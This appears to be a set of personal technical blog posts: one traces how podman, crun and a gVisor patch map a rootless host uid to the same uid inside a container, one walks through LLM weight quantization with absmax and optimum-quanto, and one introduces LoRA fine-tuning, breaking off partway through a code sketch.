<p>不忘初心 方得始终 (Stay true to the original aspiration) — Terenceli’s blog</p>
<h1> Map non-root user in host to non-root user in container with the same uid (2025-10-11) — <a href="http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2025/10/11/identity-usermap">link</a> </h1>
<h2> Introduction </h2>
<p>While using gVisor’s rootless mode, I found that a non-root user can only be mapped to root inside the container. Some software behaves differently for root and non-root users, so I wanted gVisor to map the non-root host user to the same non-root user in the container.</p>
<p>The following is what I wanted: the uid=1000 user is the same both inside the container’s user namespace and in the outside user namespace.</p>
<p><img src="/assets/img/identityuserns/1.png" alt="" /></p>
<p>My first attempt was to set the container’s user to uid 1000:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
"process": {
"user": {
"uid": 1000,
"gid": 1000
},
</code></pre></div></div>
<p>However, this <a href="https://github.com/google/gvisor/issues/9918">doesn’t work</a>. I then tried an OCI config.json with the following configuration:</p>
<ul>
<li>Set process.user to uid/gid 1000</li>
<li>Set linux.uidMappings to map host uid 1000 to container uid 1000</li>
<li>Add a user namespace to linux.namespaces</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
{
"ociVersion": "1.0.0",
"process": {
"user": {
"uid": 1000,
"gid": 1000
},
"args": [
"sh"
],
"env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"TERM=xterm"
],
"cwd": "/",
"capabilities": {
"bounding": [
"CAP_AUDIT_WRITE",
"CAP_KILL",
"CAP_NET_BIND_SERVICE",
"CAP_NET_RAW"
],
"effective": [
"CAP_AUDIT_WRITE",
"CAP_KILL",
"CAP_NET_BIND_SERVICE",
"CAP_NET_RAW"
],
"inheritable": [
"CAP_AUDIT_WRITE",
"CAP_KILL",
"CAP_NET_BIND_SERVICE",
"CAP_NET_RAW"
],
"permitted": [
"CAP_AUDIT_WRITE",
"CAP_KILL",
"CAP_NET_BIND_SERVICE"
]
},
"rlimits": [
{
"type": "RLIMIT_NOFILE",
"hard": 1024,
"soft": 1024
}
]
},
"root": {
"path": "rootfs",
"readonly": true
},
"hostname": "runsc",
"mounts": [
{
"destination": "/proc",
"type": "proc",
"source": "proc"
},
{
"destination": "/dev",
"type": "tmpfs",
"source": "tmpfs"
},
{
"destination": "/sys",
"type": "sysfs",
"source": "sysfs",
"options": [
"nosuid",
"noexec",
"nodev",
"ro"
]
},
{
"destination": "/tmp",
"type": "bind",
"source": "/tmp",
"options": [
"rbind",
"rw"
]
}
],
"linux": {
"uidMappings": [
{
"containerID": 1000,
"hostID": 1000,
"size": 1
}
],
"gidMappings": [
{
"containerID": 1000,
"hostID": 1000,
"size": 1
}
],
"namespaces": [
{
"type": "pid"
},
{
"type": "network"
},
{
"type": "ipc"
},
{
"type": "uts"
},
{
"type": "mount"
},
{
"type": "user"
}
]
}
}
</code></pre></div></div>
<p>This configuration maps the uid=1000 user on the host to the uid=1000 user in the container, which I expected to work. However, it doesn’t.</p>
<p>The error occurs in unix.RawSyscall(unix.SYS_SETUID, 0, 0, 0):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
func syncUsernsForRootless(fd int) {
    if err := waitForFD(fd, "userns sync FD"); err != nil {
        util.Fatalf("failed to sync on userns FD: %v", err)
    }

    // SETUID changes UID on the current system thread, so we have
    // to re-execute current binary.
    runtime.LockOSThread()
    if _, _, errno := unix.RawSyscall(unix.SYS_SETUID, 0, 0, 0); errno != 0 {
        util.Fatalf("failed to set UID: %v", errno)
    }
    if _, _, errno := unix.RawSyscall(unix.SYS_SETGID, 0, 0, 0); errno != 0 {
        util.Fatalf("failed to set GID: %v", errno)
    }
}
</code></pre></div></div>
<p>This is reasonable: we are the uid=1000 user in the current user namespace, so we cannot call setuid(0).
So how can we achieve our goal? Before analyzing further, let’s see how podman and crun do it.</p>
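<p>The failure can be modeled simply: inside a user namespace, a uid is only usable if it appears in that namespace’s uid_map. Below is a hedged Python sketch of this rule (a simplification that ignores the kernel’s capability checks):</p>

```python
# Toy model of the rule that makes setuid(0) fail above: setuid(target)
# in a user namespace only succeeds if `target` is mapped in the
# namespace's uid_map (capability checks omitted for simplicity).
def setuid_allowed(uid_map, target):
    """uid_map is a list of (container_id, host_id, size) entries."""
    return any(cid <= target < cid + size for cid, _hid, size in uid_map)

# The OCI config above only maps container uid 1000 -> host uid 1000:
uid_map = [(1000, 1000, 1)]
assert not setuid_allowed(uid_map, 0)    # gVisor's setuid(0) fails here
assert setuid_allowed(uid_map, 1000)     # but uid 1000 is usable
```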
<h2> The podman userns=keep-id implementation </h2>
<p>The ‘podman run’ command has a ‘--userns’ option which can be set to ‘--userns=keep-id’. This achieves what I want: running the container process with the same uid as the user outside the container.</p>
<p>The following picture shows it:</p>
<p><img src="/assets/img/identityuserns/2.png" alt="" /></p>
<p>podman starts conmon (apparently via systemd). conmon then starts the container’s first process.</p>
<p><img src="/assets/img/identityuserns/3.png" alt="" /></p>
<p>Let’s see the OCI spec.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
test@test-virtual-machine:~$ podman inspect 8de77c63d183 --format json | grep OCI
"OCIConfigPath": "/home/test/xxxuserdata/config.json",
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
"linux": {
"uidMappings": [
{
"containerID": 0,
"hostID": 1,
"size": 1000
},
{
"containerID": 1000,
"hostID": 0,
"size": 1
},
{
"containerID": 1001,
"hostID": 1001,
"size": 64536
}
],
"gidMappings": [
{
"containerID": 0,
"hostID": 1,
"size": 1000
},
{
"containerID": 1000,
"hostID": 0,
"size": 1
},
{
"containerID": 1001,
"hostID": 1001,
"size": 64536
}
],
</code></pre></div></div>
<p>As we can see, it maps host uid=0 to container uid=1000. But where is our host uid=1000? What I need is host uid=1000 mapped to container uid=1000.</p>
<p>After digging into the code and exploring the uid_map of the conmon and container processes, I found the truth.</p>
<p>Inside the container, the uid_map is as follows, exactly matching the OCI spec.</p>
<p><img src="/assets/img/identityuserns/4.png" alt="" /></p>
<p>The conmon’s uid_map.</p>
<p><img src="/assets/img/identityuserns/5.png" alt="" /></p>
<p>The container’s uid_map</p>
<p><img src="/assets/img/identityuserns/6.png" alt="" /></p>
<p>Now we can conclude: a podman rootless container creates two user namespaces. One is for conmon, which maps host uid=1000 to uid=0; conmon then starts the container process, which maps its uid=0 to container uid=1000. Through this method, container uid=1000 is the same user as host uid=1000.</p>
<p>Notice that the container’s uid_map looks different from the host view and from the container view. This is because the uid_map read handler adjusts the output according to the reader’s user namespace.</p>
<p>The following picture shows the process.</p>
<p><img src="/assets/img/identityuserns/7.png" alt="" /></p>
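<p>The two-level trick can be checked numerically. The sketch below composes the two uid_map tables (assuming conmon’s namespace maps host uid 1000 to 0, with the subuid ranges omitted; the container mapping is taken from the OCI spec above) and verifies that host uid 1000 ends up as container uid 1000:</p>

```python
def map_uid(uid_map, outer_uid):
    """Translate an outer-namespace uid to an inner uid, given uid_map
    entries of the form (inner_id, outer_id, size); None if unmapped."""
    for inner, outer, size in uid_map:
        if outer <= outer_uid < outer + size:
            return inner + (outer_uid - outer)
    return None

# conmon's user namespace: host uid 1000 -> uid 0 (subuid ranges omitted)
conmon_map = [(0, 1000, 1)]
# container's user namespace (relative to conmon's ns), from the OCI spec:
container_map = [(0, 1, 1000), (1000, 0, 1), (1001, 1001, 64536)]

in_conmon = map_uid(conmon_map, 1000)            # host 1000 -> 0 in conmon ns
in_container = map_uid(container_map, in_conmon)
assert (in_conmon, in_container) == (0, 1000)    # host 1000 ends up as 1000
```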
<h2> The crun method </h2>
<p>So, does crun work with the following OCI spec (the same as my second attempt)?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
{
"ociVersion": "1.0.2-dev",
"process": {
"terminal": true,
"user": {
"uid": 1000,
"gid": 1000
},
"args": [
"sh"
],
"env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"TERM=xterm"
],
"cwd": "/",
"capabilities": {
"bounding": [
"CAP_AUDIT_WRITE",
"CAP_KILL",
"CAP_NET_BIND_SERVICE"
],
"effective": [
"CAP_AUDIT_WRITE",
"CAP_KILL",
"CAP_NET_BIND_SERVICE"
],
"permitted": [
"CAP_AUDIT_WRITE",
"CAP_KILL",
"CAP_NET_BIND_SERVICE"
],
"ambient": [
"CAP_AUDIT_WRITE",
"CAP_KILL",
"CAP_NET_BIND_SERVICE"
]
},
"rlimits": [
{
"type": "RLIMIT_NOFILE",
"hard": 1024,
"soft": 1024
}
],
"noNewPrivileges": true
},
"root": {
"path": "rootfs",
"readonly": true
},
"hostname": "runc",
"mounts": [
{
"destination": "/proc",
"type": "proc",
"source": "proc"
},
{
"destination": "/dev",
"type": "tmpfs",
"source": "tmpfs",
"options": [
"nosuid",
"strictatime",
"mode=755",
"size=65536k"
]
},
{
"destination": "/dev/pts",
"type": "devpts",
"source": "devpts",
"options": [
"nosuid",
"noexec",
"newinstance",
"ptmxmode=0666",
"mode=0620"
]
},
{
"destination": "/dev/shm",
"type": "tmpfs",
"source": "shm",
"options": [
"nosuid",
"noexec",
"nodev",
"mode=1777",
"size=65536k"
]
},
{
"destination": "/dev/mqueue",
"type": "mqueue",
"source": "mqueue",
"options": [
"nosuid",
"noexec",
"nodev"
]
},
{
"destination": "/sys",
"type": "none",
"source": "/sys",
"options": [
"rbind",
"nosuid",
"noexec",
"nodev",
"ro"
]
},
{
"destination": "/sys/fs/cgroup",
"type": "cgroup",
"source": "cgroup",
"options": [
"nosuid",
"noexec",
"nodev",
"relatime",
"ro"
]
},
{
"destination": "/tmp",
"type": "bind",
"source": "/home/test/cruntest/mycontainer/rootfs/tmp",
"options": [
"rw",
"rbind"
]
}
],
"linux": {
"uidMappings": [
{
"containerID": 1000,
"hostID": 1000,
"size": 1
}
],
"gidMappings": [
{
"containerID": 1000,
"hostID": 1000,
"size": 1
}
],
"namespaces": [
{
"type": "pid"
},
{
"type": "ipc"
},
{
"type": "uts"
},
{
"type": "mount"
},
{
"type": "cgroup"
},
{
"type": "user"
}
],
"maskedPaths": [
"/proc/acpi",
"/proc/asound",
"/proc/kcore",
"/proc/keys",
"/proc/latency_stats",
"/proc/timer_list",
"/proc/timer_stats",
"/proc/sched_debug",
"/sys/firmware",
"/proc/scsi"
],
"readonlyPaths": [
"/proc/bus",
"/proc/fs",
"/proc/irq",
"/proc/sys",
"/proc/sysrq-trigger"
]
}
}
</code></pre></div></div>
<p>Yes it works.</p>
<p><img src="/assets/img/identityuserns/8.png" alt="" /></p>
<p>Let’s see the uid_map:</p>
<p><img src="/assets/img/identityuserns/9.png" alt="" /></p>
<p>Just as expected.</p>
<p>crun also calls ‘setresuid’, but the uid it switches to is not always 0 (which is what gVisor did). If the root (uid=0) user is mapped into the container’s user namespace, 0 is used; if not, ‘def->process->user->uid’ is used.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
/* Detect if root is available in the container. */
static bool
root_mapped_in_container_p (runtime_spec_schema_defs_id_mapping **mappings, size_t len)
{
  size_t i;

  for (i = 0; i < len; i++)
    if (mappings[i]->container_id == 0)
      return true;
  return false;
}

static int
set_id_init (libcrun_container_t *container, libcrun_error_t *err)
{
  runtime_spec_schema_config_schema *def = container->container_def;
  uid_t uid = 0;
  gid_t gid = 0;
  int ret;

  if (def->process && def->process->user && def->linux)
    {
      /*
        If it is running in a user namespace and root is not mapped
        use the UID/GID specified for running the container.
      */
      bool root_mapped = false;

      if (def->linux->uid_mappings_len != 0)
        {
          root_mapped = root_mapped_in_container_p (def->linux->uid_mappings, def->linux->uid_mappings_len);
          if (! root_mapped)
            uid = def->process->user->uid;
          libcrun_debug ("Using mapped UID in container: `%d`", uid);
        }

      if (def->linux->gid_mappings_len != 0)
        {
          root_mapped = root_mapped_in_container_p (def->linux->gid_mappings, def->linux->gid_mappings_len);
          if (! root_mapped)
            gid = def->process->user->gid;
          libcrun_debug ("Using mapped GID in container: `%d`", gid);
        }
    }

  ret = setresuid (uid, uid, uid);
  if (UNLIKELY (ret < 0))
    return crun_make_error (err, errno, "setresuid to `%d`", uid);

  ret = setresgid (gid, gid, gid);
  if (UNLIKELY (ret < 0))
    return crun_make_error (err, errno, "setresgid to `%d`", gid);

  return 0;
}
</code></pre></div></div>
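<p>crun’s decision rule can be condensed into a few lines of Python (a sketch over OCI-style mapping dicts, not crun’s actual data structures):</p>

```python
def sandbox_uid(uid_mappings, process_uid):
    """If root is mapped into the container's user ns, switch to 0;
    otherwise use the uid from process.user (crun's rule above)."""
    root_mapped = any(m["containerID"] == 0 for m in uid_mappings)
    return 0 if root_mapped else process_uid

# identity mapping (my config): root is not mapped, so uid 1000 is used
assert sandbox_uid([{"containerID": 1000, "hostID": 1000, "size": 1}], 1000) == 1000
# podman keep-id style mapping: container uid 0 exists, so 0 is used
assert sandbox_uid([{"containerID": 0, "hostID": 1, "size": 1000}], 1000) == 0
```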
<h2> The gVisor method </h2>
<p>The <a href="https://github.com/google/gvisor/pull/12166/commits/0b6d43a255a78c12e797d954cc3a6ca894d15635">gVisor patch</a> also follows crun’s method (as suggested by avagin): if the root user is not mapped into the container’s user namespace, ‘Process.User.UID’ is used.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
func rootMappedInContainer(IDMap []specs.LinuxIDMapping) bool {
    for _, idMap := range IDMap {
        if idMap.ContainerID == 0 {
            return true
        }
    }
    return false
}

func SandboxUserGroupIDs(spec *specs.Spec) (uint32, uint32) {
    uid := uint32(0)
    gid := uint32(0)
    if !rootMappedInContainer(spec.Linux.UIDMappings) {
        uid = spec.Process.User.UID
    }
    if !rootMappedInContainer(spec.Linux.GIDMappings) {
        gid = spec.Process.User.GID
    }
    return uid, gid
}
</code></pre></div></div>
<p>After this, we can run gVisor in rootless mode with the non-root host user mapped to a non-root container user with the same uid.</p>
<p>With the new patch, the following works well.</p>
<p><img src="/assets/img/identityuserns/10.png" alt="" /></p>
<h2> Summary </h2>
<p>The key insight is that a child process in a new user namespace has full capabilities in that namespace even if it has a non-zero uid, so it can still call setuid(0).</p>
<h1> An Introduction to Large Model Quantization (2025-07-26) — <a href="http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2025/07/26/quant-introduction">link</a> </h1>
<p>This post records my process of learning about large language model quantization. It does not cover advanced quantization strategies or compare quantization quality; it only records my exploration of the quantization process. The idea of quantization is essentially simple: convert the model’s stored data from floating-point numbers to integers to reduce memory usage. This process necessarily involves numeric conversion, model saving, and loading. Still, studying quantization took me longer than LoRA did, because there are many pitfalls in practice that reading online articles alone will not reveal. Concretely, at least the following:</p>
<ul>
<li>transformers’ built-in quantization, i.e. the load_in_8bit parameter, depends on bitsandbytes, which has poor Windows support and requires a GPU.</li>
<li>Using the quanto library directly for quantization is problematic; you need optimum-quanto.</li>
<li>The quantization effect may look unimpressive because typically only the Linear and Norm layers are quantized and many layers are left alone; with GPT-2, for example, many layers are not quantized.</li>
<li>After quantizing with quanto’s quantize, you still need to call freeze to actually convert the weights to INT8.</li>
</ul>
<p>Now let’s start exploring quantization.</p>
<h2> Quantization basics </h2>
<p>LLM quantization means converting model parameters from high precision (e.g. FP32, 4 bytes) to low precision (e.g. INT8, 1 byte). The figure below (from <a href="https://hdu-cs.wiki/3.AI%E6%A8%A1%E5%9D%97/3.8%E3%80%90LLM%E3%80%91%E5%A4%A7%E8%AF%AD%E8%A8%80%E6%A8%A1%E5%9E%8B/3.8.5LLM%E5%AE%9E%E6%93%8D%E9%A1%B9%E7%9B%AE/3.8.5.6Huggingface%E7%9A%84%E9%87%8F%E5%8C%96%E5%9F%BA%E7%A1%80.html#%E9%87%8F%E5%8C%96">Hugging Face quantization basics</a>) shows the core idea of quantization:</p>
<p><img src="/assets/img/quanto/1.png" alt="" /></p>
<p>As you can see, memory usage after quantization drops to a quarter.</p>
<p>The core of quantization is how to construct this mapping so that the low-precision model stays as accurate as possible. Here I only introduce the simplest symmetric scheme, absmax. The figures below (from <a href="https://note.iawen.com/note/llm/llm_quantization">LLM quantization summary</a>) show the basic idea: map the absolute value of the input’s maximum to 127, so the whole range maps into [-127, 127], and the original high-precision 0 maps to the low-precision 0.</p>
<p><img src="/assets/img/quanto/2.png" alt="" /></p>
<p><img src="/assets/img/quanto/3.png" alt="" /></p>
<p>After dequantization you can see that some precision has been lost.</p>
<h2> Manual quantization </h2>
<p>Following the example in <a href="https://zhuanlan.zhihu.com/p/13246283654">LLM quantization principles and GPT-2 quantization in practice</a>, let’s run a manual absmax quantization experiment.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def absmax_quantize(X):
    # compute the scale factor
    scale = 127 / torch.max(torch.abs(X))
    # quantize
    X_quant = (scale * X).round()
    # dequantize
    X_dequant = X_quant / scale
    return X_quant.to(torch.int8), X_dequant

from transformers import AutoModelForCausalLM, AutoTokenizer
import torch

torch.manual_seed(0)

# run on the CPU
device = 'cpu'

# load the model and tokenizer
model_id = 'gpt2'
model = AutoModelForCausalLM.from_pretrained(model_id).to(device)
tokenizer = AutoTokenizer.from_pretrained(model_id)

# print the model size
print(f"Model size: {model.get_memory_footprint():,} bytes")

# extract the weights of the first attention layer
weights = model.transformer.h[0].attn.c_attn.weight.data
print("Original weights:")
print(weights)

# quantize with the absmax method
weights_abs_quant, _ = absmax_quantize(weights)
print("\nAbsmax-quantized weights:")
print(weights_abs_quant)
</code></pre></div></div>
<p>The output below shows that the weights have been converted from high precision to low precision.</p>
<p><img src="/assets/img/quanto/4.png" alt="" /></p>
<p>Next, quantize the whole GPT-2 model:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
import numpy as np
from copy import deepcopy

# keep the original weights
weights = [param.data.clone() for param in model.parameters()]

# create a copy of the model to quantize
model_abs = deepcopy(model)

# quantize all model weights
weights_abs = []
for param in model_abs.parameters():
    _, dequantized = absmax_quantize(param.data)
    param.data = dequantized
    weights_abs.append(dequantized)

weights = model.transformer.h[0].attn.c_attn.weight.data
print("Original weights:")
print(weights)

weights1 = model_abs.transformer.h[0].attn.c_attn.weight.data
print("Weights after quantization:")
print(weights1)
</code></pre></div></div>
<p>Note that the second return value of absmax_quantize is the value dequantized back to the original precision, which differs slightly from the original high-precision value: dequantizing the INT8 values back yields a result with a small precision gap from the original.</p>
<p><img src="/assets/img/quanto/5.png" alt="" /></p>
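<p>The bounded-error behavior can also be shown without torch. Below is a pure-Python absmax sketch (round-to-nearest keeps the dequantization error within half a quantization step, i.e. 0.5 / scale):</p>

```python
def absmax_quantize_py(xs):
    # symmetric absmax quantization on a plain list of floats
    scale = 127.0 / max(abs(x) for x in xs)
    q = [round(x * scale) for x in xs]       # integer values in [-127, 127]
    dq = [v / scale for v in q]              # dequantized floats
    return q, dq

xs = [0.1, -0.5, 2.0, -1.27]
q, dq = absmax_quantize_py(xs)
scale = 127.0 / 2.0

assert q[2] == 127                           # the absmax value maps to 127
assert all(-127 <= v <= 127 for v in q)
assert all(abs(a - b) <= 0.5 / scale + 1e-12 for a, b in zip(xs, dq))
```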
<h2> Quantization with the quanto library </h2>
<p>Next, let’s quantize with the quanto library.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
pip install optimum-quanto
</code></pre></div></div>
<p>Quantize and save the quantized model; here I test with Qwen2-0.5B-Instruct.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
from transformers import AutoModelForCausalLM
from optimum.quanto import QuantizedModelForCausalLM, qint8
model = AutoModelForCausalLM.from_pretrained('Qwen/Qwen2-0.5B-Instruct')
qmodel = QuantizedModelForCausalLM.quantize(model, weights=qint8, exclude='lm_head')
qmodel.save_pretrained('./Qwen2-0.5B-Instruct-quantized')
</code></pre></div></div>
<p>Load the quantized model and compare the outputs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
from optimum.quanto import QuantizedModelForCausalLM
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2-0.5B-Instruct")
model = AutoModelForCausalLM.from_pretrained('Qwen/Qwen2-0.5B-Instruct')
qmodel = QuantizedModelForCausalLM.from_pretrained('./Qwen2-0.5B-Instruct-quantized')
input_text = "Hello, who are you? "
input_ids = tokenizer(input_text, return_tensors="pt").input_ids
outputs = qmodel.generate(input_ids)
print(tokenizer.decode(outputs[0]))
outputs2 = model.generate(input_ids)
print(tokenizer.decode(outputs2[0]))
</code></pre></div></div>
<p><img src="/assets/img/quanto/6.png" alt="" /></p>
<p>Let’s first look at how quantization is reflected in the model files, then analyze how a quantized model is loaded. Judging by size, the file is indeed smaller, but not by much, because the quantized file also has to store extra data.</p>
<p><img src="/assets/img/quanto/7.png" alt="" /></p>
<p><img src="/assets/img/quanto/8.png" alt="" /></p>
<p>Note that the quantized directory also contains a quanto_qmap.json, which records the configuration of each weight, e.g. the quantization scheme used.</p>
<p><img src="/assets/img/quanto/9.png" alt="" /></p>
<p>Opening the model.safetensors files before and after quantization, you can see the dtype changes from BF16 to I8.</p>
<p><img src="/assets/img/quanto/10.png" alt="" /></p>
<p><img src="/assets/img/quanto/11.png" alt="" /></p>
<p>You can see that the weight’s dtype changed and its location is different too: one is xxx.weight directly, the other is xxx.weight._data.
So why isn’t the model that much smaller? The quantized model file contains many input_scale and output_scale tensors, which are needed when loading the quantized model. Of course this is just how the quanto library works; other quantization schemes may use different storage layouts.</p>
<p><img src="/assets/img/quanto/12.png" alt="" /></p>
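<p>A sketch of what this storage layout means: the checkpoint holds an int8 tensor under xxx.weight._data plus a float scale, and dequantization is just an elementwise multiply. (The exact scale layout may be per-axis in real quanto; a single per-tensor scale is used here purely for illustration.)</p>

```python
data = [-127, 64, 0, 127]     # stands in for xxx.weight._data (int8)
scale = 0.0157                # stands in for the stored scale tensor
weight = [v * scale for v in data]   # dequantized float weight

assert weight[2] == 0.0                  # zero stays exactly zero
assert abs(weight[0] + 1.9939) < 1e-9    # -127 * 0.0157
```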
<p>Next, let’s debug the loading of the quantized model. First, compare the model before and after quantization:</p>
<p><img src="/assets/img/quanto/13.png" alt="" /></p>
<p><img src="/assets/img/quanto/14.png" alt="" /></p>
<p>Only the Linear layers were quantized, becoming QLinear. Next, look at the weights.</p>
<p><img src="/assets/img/quanto/15.png" alt="" /></p>
<p><img src="/assets/img/quanto/16.png" alt="" /></p>
<p>You can see the quantized weights are INT8 integers.
Let’s look directly at the values during self-attention before and after quantization, taking layer 0’s q computation as an example. First the quantized one:</p>
<p><img src="/assets/img/quanto/17.png" alt="" /></p>
<p><img src="/assets/img/quanto/18.png" alt="" /></p>
<p>There is a difference, but it is very small.
But as the model above shows, the quantized weights are INT8, so why is the computation here done with dequantized values? The answer is hidden in QLinear’s forward.
Here the input is the matrix produced by embedding the input tokens (prefill phase), and self.qweight is the quantized weight.</p>
<p><img src="/assets/img/quanto/19.png" alt="" /></p>
<p>Single-stepping into this leads into quanto’s internals; the dequantized computation finally happens in the qbytes_mm function.</p>
<p><img src="/assets/img/quanto/20.png" alt="" /></p>
<p>To sum up, we have analyzed the whole process from quantization to inference with a quantized model:</p>
<ul>
<li>When quantizing, a quantization strategy converts the high-precision parameters to low precision, so the model saved to disk becomes smaller</li>
<li>When loading, the quantized model loads INT8 directly into GPU/CPU memory, reducing memory usage</li>
<li>During inference there is a dequantization step, i.e. converting INT back to floating point</li>
</ul>
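<p>The inference path summarized above can be sketched in a few lines: the weight lives as int8 plus a scale, and the forward pass dequantizes before the matmul (which is what quanto’s qbytes_mm ends up doing on this fallback path). This is a simplified stand-in, not quanto’s actual code:</p>

```python
def qlinear_forward(x, w_int8, w_scale):
    # dequantize the int8 weight, then do the matmul (one row per output)
    w = [[v * w_scale for v in row] for row in w_int8]
    return [sum(xi * wi for xi, wi in zip(x, row)) for row in w]

x = [1.0, 2.0]
w_int8 = [[127, 0], [0, 127]]            # int8 weight, identity after scaling
out = qlinear_forward(x, w_int8, 1.0 / 127)
assert all(abs(o - e) < 1e-9 for o, e in zip(out, [1.0, 2.0]))
```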
<h2> Ref </h2>
<p><a href="https://note.iawen.com/note/llm/llm_quantization">LLM quantization summary</a></p>
<p><a href="https://hdu-cs.wiki/3.AI%E6%A8%A1%E5%9D%97/3.8%E3%80%90LLM%E3%80%91%E5%A4%A7%E8%AF%AD%E8%A8%80%E6%A8%A1%E5%9E%8B/3.8.5LLM%E5%AE%9E%E6%93%8D%E9%A1%B9%E7%9B%AE/3.8.5.6Huggingface%E7%9A%84%E9%87%8F%E5%8C%96%E5%9F%BA%E7%A1%80.html">Hugging Face quantization basics</a></p>
<p><a href="https://zhuanlan.zhihu.com/p/13246283654">LLM quantization principles and GPT-2 quantization in practice</a></p>
<h1> An Introduction to LoRA Fine-tuning (2025-07-05) — <a href="http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2025/07/05/lora-introduction">link</a> </h1>
<!--script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=default"-->
<!-- mathjax config similar to math.stackexchange -->
<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS_HTML" type="text/javascript"></script>
<h2> Introduction to LLM fine-tuning </h2>
<p>Fine-tuning means taking a pretrained large model and training it further on a smaller dataset for a specific task or domain, quickly and cheaply turning a general-purpose “generalist” model into a task-specific “specialist”, without training from scratch.</p>
<p>For example, the original GPT model only predicts the probability of the next token; to turn it into a chatbot it still has to be fine-tuned on alignment data.</p>
<p>The basic idea of fine-tuning is as follows.</p>
<p><img src="/assets/img/loraintro/1.png" alt="" /></p>
<p>Below is pseudocode generated by deepseek; the core steps are:</p>
<ul>
<li>Initialization: load a pretrained large model, e.g. one released by a major vendor</li>
<li>Prepare the dataset: the data used for fine-tuning, e.g. chat data for a chat model</li>
<li>Configure parameters, e.g. how parameters are updated and how the loss is computed</li>
<li>Training: feed the dataset samples through the model’s forward pass, compute the loss between the model outputs and the sample labels, and backpropagate to update the model parameters</li>
<li>Finally save the model parameters, completing one round of fine-tuning</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
# ========== Initialization ==========
# load the pretrained large model
pretrained_model = load_model("LLaMA-3")  # e.g. GPT, BERT, LLaMA, ...
pretrained_model.freeze_weights()  # for PEFT, freeze the base weights

# prepare the fine-tuning dataset
finetune_dataset = load_dataset(
    path="domain_specific_data.csv",  # domain/task-specific data
    format="input-target"             # input / target-output pairs
)

# configure training parameters
optimizer = AdamW(
    params=pretrained_model.trainable_params,  # only update trainable params
    lr=2e-5,                                   # a small learning rate
    weight_decay=0.01
)
loss_function = CrossEntropyLoss()
scheduler = CosineAnnealingLR(optimizer, T_max=100)

# ========== Fine-tuning loop ==========
for epoch in range(num_epochs):
    for batch in finetune_dataloader:
        # forward pass
        inputs, targets = batch
        outputs = pretrained_model(inputs)

        # compute the loss
        loss = loss_function(outputs, targets)

        # backward pass
        loss.backward()

        # gradient clipping (avoid exploding gradients)
        torch.nn.utils.clip_grad_norm_(pretrained_model.parameters(), 1.0)

        # parameter update
        optimizer.step()
        scheduler.step()
        optimizer.zero_grad()

        # logging
        log_metrics(loss, accuracy)

# ========== Output ==========
# save the fine-tuned model
finetuned_model = pretrained_model
save_model(finetuned_model, "legal_assistant_model.pth")

# deploy
deployment = ModelDeployment(finetuned_model)
deployment.serve(endpoint="/api/legal-assistant")
</code></pre></div></div>
<p>The above is essentially full-parameter fine-tuning. It certainly improves the model in a specific domain, but its drawbacks are obvious: high training cost, long training time, and a large storage footprint (think of tens of billions of parameters all kept in GPU memory).</p>
<p>Hence the various fine-tuning optimizations; here I introduce LoRA.</p>
<h2> Introduction to LoRA </h2>
<p>LoRA (<a href="https://arxiv.org/pdf/2106.09685">LORA: LOW-RANK ADAPTATION OF LARGE LANGUAGE MODELS</a>) stands for low-rank adaptation. Its core idea is shown on the right of the figure below:</p>
<p><img src="/assets/img/loraintro/2.png" alt="" /></p>
<p>The core ideas of LoRA are:</p>
<ul>
<li>Add a bypass next to the parameters of the pretrained language model (PLM) that first projects down to a low dimension and then back up</li>
<li>During training, freeze the PLM parameters and train only the down/up projection matrices A and B; at the output, add the product of the input with the A·B path to the PLM output</li>
<li>A is initialized from a random Gaussian, B is initialized to the zero matrix.</li>
</ul>
<p>The left side of the figure shows full fine-tuning, where \(W_{0} \in R^{d\times d}\) is the pretrained weight and \(\bigtriangleup W\) is the fine-tuning update. The split makes sense because during fine-tuning \(W_{0}\) is frozen and only \(\bigtriangleup W\) changes. In full fine-tuning, \(\bigtriangleup W\) has the same size as \(W_{0}\), namely \(d\times d\), which is usually very large.</p>
<p>The right side is LoRA fine-tuning: the input is first projected down through matrix A, \(A\in R^{d\times r}\), where r (the rank) is a fairly small value, then projected back up through matrix B, \(B\in R^{r\times d}\). After the input x passes through A and B, the update \(\bigtriangleup W\) is still \(d\times d\), and adding \(\bigtriangleup W\) to \(W_{0}\) still fine-tunes the layer.</p>
<p>The key is that r is much smaller than d. If d is 100, full fine-tuning updates \(d\times d\) = 10000 parameters, but with r set to 8 only \(2\times r\times d\) = 1600 parameters need updating.</p>
<p>As for why this works, it builds on earlier intrinsic-dimension research; roughly, the useful directions of the parameters lie in a low-dimensional subspace.</p>
<p>I haven’t read the paper in detail; let’s just try it out.</p>
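<p>The LoRA computation above can be sketched numerically in pure Python (treating x as a row vector): y = x @ W0 + (x @ A) @ B, with W0 frozen and only A and B trained. W0 is taken as the identity here purely for illustration:</p>

```python
d, r = 4, 1
W0 = [[1.0 if i == j else 0.0 for j in range(d)] for i in range(d)]  # frozen
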